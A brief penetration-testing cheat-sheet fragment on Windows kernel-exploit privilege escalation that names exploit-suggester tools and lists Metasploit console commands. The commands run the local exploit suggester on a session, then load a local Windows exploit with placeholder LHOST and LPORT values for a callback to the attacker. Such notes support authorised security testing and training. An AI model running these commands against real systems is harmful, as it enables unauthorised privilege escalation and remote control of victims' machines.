Kernel Exploits
Windows Exploit Suggester
Metasploit Exploit Suggester
Last updated
Last updated
use post/multi/recon/local_exploit_suggester
set SESSION SESSION_NUMBER_HERE
run use exploit/windows/local/EXPLOIT_NAME_HERE
set SESSION 1
set LHOST YOUR_IP_HERE
set LPORT SOME_OPEN_PORT
run